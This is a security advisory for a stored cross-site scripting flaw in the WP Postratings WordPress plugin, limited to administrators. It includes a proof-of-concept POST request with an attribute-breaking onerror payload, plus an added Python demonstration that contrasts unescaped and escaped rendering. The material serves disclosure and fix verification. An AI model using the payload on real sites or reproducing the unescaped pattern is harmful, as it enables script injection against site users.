WP Postratings < 1.86.1 - Admin+ Stored Cross-Site Scripting
Description
The plugin does not sanitise or escape the postratings_image parameter submitted from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php) before storing it and later outputting it in HTML. The page is only reachable by administrators and the form is nonce-protected against CSRF, so the issue only matters where administrators do not hold the unfiltered_html capability (for example when DISALLOW_UNFILTERED_HTML is defined in wp-config.php, or for non-super-admin administrators on a multisite install). In that configuration an administrator who cannot otherwise store script markup can use this option to plant a stored payload that runs wherever the option value is rendered.
Proof of Concept
POST /wp-admin/admin.php?page=wp-postratings/postratings-options.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1954
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

_wpnonce=fad0d9fb37&postratings_image=plusminus_crystal\"+onerror=alert(/XSS/);/&postratings_max=2&[SNIPPED]&Submit=Save+Changes
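The following is an added example, not code from the advisory or from the WP-PostRatings plugin. It decodes the postratings_image field from an abridged copy of the PoC body the way PHP populates $_POST, drops the value into an <img src> attribute the way an unescaped option would be rendered (the image path layout and the tag template are assumptions, not the plugin's actual code), and parses the result as a browser would to show that an onerror handler appears as its own attribute. The fixed renderer applies attribute escaping, with Python's html.escape(quote=True) standing in for WordPress's esc_attr().

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Constructed, abridged copy of the advisory's PoC body; the nonce is a
# placeholder and the [SNIPPED] parameters are left out. Only
# postratings_image matters for the demonstration.
POC_BODY = (
    '_wpnonce=fad0d9fb37'
    '&postratings_image=plusminus_crystal\\"+onerror=alert(/XSS/);/'
    '&postratings_max=2&Submit=Save+Changes'
)

# Assumed path layout for the rating images; not taken from the plugin.
IMAGE_BASE = "/wp-content/plugins/wp-postratings/images/"


def form_field(body: str, name: str) -> str:
    """Decode one application/x-www-form-urlencoded field the way PHP fills
    $_POST: pairs are split on '&' only and '+' becomes a space."""
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            return unquote_plus(value)
    raise KeyError(name)


def render_vulnerable(image_option: str) -> str:
    """Option value concatenated straight into a src attribute: the bug class
    the advisory describes (template is an assumption)."""
    return f'<img src="{IMAGE_BASE}{image_option}/rating_on.gif" alt="rating">'


def render_fixed(image_option: str) -> str:
    """Same template with attribute escaping; html.escape(quote=True) plays the
    role of WordPress esc_attr(), turning '"' into '&quot;'."""
    safe = html.escape(image_option, quote=True)
    return f'<img src="{IMAGE_BASE}{safe}/rating_on.gif" alt="rating">'


class _ImgAttrs(HTMLParser):
    """Collect the attributes a browser would see on the <img> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.attrs.update(dict(attrs))


def img_attributes(markup: str) -> dict:
    parser = _ImgAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_handlers(markup: str) -> list:
    """Event-handler attributes that escaped from the src value."""
    return sorted(a for a in img_attributes(markup) if a.startswith("on"))


if __name__ == "__main__":
    value = form_field(POC_BODY, "postratings_image")
    print("stored option:", value)
    print("vulnerable:", render_vulnerable(value), injected_handlers(render_vulnerable(value)))
    print("fixed:", render_fixed(value), injected_handlers(render_fixed(value)))
```

In the vulnerable rendering the stored value closes the src attribute at the quote, so onerror=alert(/XSS/) becomes a real attribute on the tag; in the escaped rendering the whole payload stays inside the src value and no handler attribute exists. The same check (parse the output, list any on* attributes) is a quick way to confirm a fix on a test install.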
Classification
Type
XSS
Miscellaneous
Original Researcher
Park Won Seok
Verified
Yes
Timeline
Publicly Published
2020-12-24
Added
2020-12-24
Last Updated
2022-04-09